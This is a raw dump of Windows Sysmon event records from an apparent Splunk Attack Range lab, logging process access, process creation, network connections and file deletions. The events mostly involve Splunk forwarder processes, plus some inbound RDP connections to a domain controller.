09:14:46.089{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:46.088{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:46.088{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B86-6151-497A-00000000FC01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:46.088{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B86-6151-497A-00000000FC01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:46.071{5EBD8912-8B86-6151-497A-00000000FC01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001050752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.815{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53408-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:47.391{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7B3283C9D297A90F31036E69EB88819,SHA256=2AE6F7AD8E73879334F514DDAAD0E9354ACF5F20B77FEC76181A8BAD8135EF3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979449Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:44.710{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59419-false10.0.1.12-8000- 23542300x8000000000000000979448Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:47.366{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=536E0BDED3D47DBD12601FF1789DFE40,SHA256=22AF1FB8BA595EBC8F62023094D6C525575DE477F96F660245C02D767A478286,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:47.088{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9CB635C0740D64AE4C4D74208D720184,SHA256=044BB0F3C107F66C0F22F5D97883550BB71329F841D10231430F9F4F0D26A41A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979450Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:48.366{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4C6DEFEE182FA66929FADB018D45509,SHA256=7FF6D23C23EE9BC84C3DBBE367929226166F449DA5AC87F282EFDA9E03120673,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:46.932{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de62931-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:48.406{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD4B9528C783A009A1EE97E8BC699A50,SHA256=CEA7DDB3CFCD30195DF949BFAB196F20F7751EEEF7057E290B8E78BFFE851B8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:49.552{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CA6161D9BB06D9EAB7E5E23FBA37EF1,SHA256=2F94546F5A0480543FD08B48B520532A927DE0DD6920D04061497A96F8AEF23B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:49.437{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A700EABC9E4880DC74ECBAA3D1723FB0,SHA256=09C3BE719BBC5B2329DA316CF9B39EE07B1D85E6C73A4AAD89C2DCB7C0E7905C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979451Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:49.584{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3011B96F2A4DD1D2BB9E919E54E6941A,SHA256=2E7136BAF1A38AC3E1DDB1C92896B4A796DFB69ED8F227C9F25088CAB7315F1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:48.960{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse93.89.190.250-63299-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001050758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:50.707{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:50.437{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6265153302CF8A1E6B2FAE896A70F51,SHA256=622AEEA7311063AD667A9E13095A1D6EB3D3AE827298E4CE01A918463B77B573,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979452Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:50.600{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D09BC04C408D93DAD353042CCAA35BA8,SHA256=F5FF434BEE4DB57E8695ECE212EBC9F18131EC159DCB5D9CFE34F636900796ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979453Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:51.788{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CDA888CCEAE4C4D2200E4F162C8CD60,SHA256=5EDC5FC211586BB64E3745FA4BD6648F4CDB2ECDAE559B0A27A830F42A22DBAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:51.468{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E9880B186FB612E23356CC5795CE97,SHA256=42B17D3DB00993FF5CAD4913F99E929D7074FDDA90B58EC3D5F4CEC64673EC8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979454Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:52.803{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3CDE54D437CC926508154048888B717,SHA256=EC24E09276C31FBEE52888CC718202DA855CB134CCDC9CABA0C905FE538B78B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:50.944{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53409-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:52.468{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A809A21C995E5182491DC360BE05017,SHA256=A6B4ED64AFCB70D23CE3C6592C099F6B88334A0DA133AB8BD2619C05472692EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979458Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:53.819{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E38DB93A8051A022709AC11D66C32B0,SHA256=0B94289B78A300B8BB6BDF1FA52065E813999350DC03134F4D32328EDD11E1E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979457Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:53.819{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4FD5C8768AAD3F2E4E525311DC2478A,SHA256=4C9709F30A3F17409250E802C75FA30F1188E229D3D98710EAD4E7AF0427B117,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979456Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:53.819{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F1FFBDE0E21B2878A0F9A6ABDA7A29,SHA256=82E1023EBB3F9643190BF7CAFA8457103B9B0B5401FF847C7BB1FA740E5D0642,IMPHASH=00000000000000000000000000000000falsetrue 154100x80000000000000001050764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:53.970{5EBD8912-8B8D-6151-4A7A-00000000FC01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:53.488{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D9E9480041658AE09FE40C86E79D06D,SHA256=DC082DCDB01888FCD8DCF077473B734EB8FCE649232D1EC53AB61BF8DEC90A07,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979455Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:50.694{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59420-false10.0.1.12-8000- 354300x80000000000000001050784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:52.554{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50202-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001050783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.822{5EBD8912-8B8E-6151-4B7A-00000000FC01}70683668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.638{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B8E-6151-4B7A-00000000FC01}7068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.638{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.638{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.638{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.638{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.638{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8B8E-6151-4B7A-00000000FC01}7068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.638{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B8E-6151-4B7A-00000000FC01}7068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.623{5EBD8912-8B8E-6151-4B7A-00000000FC01}7068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 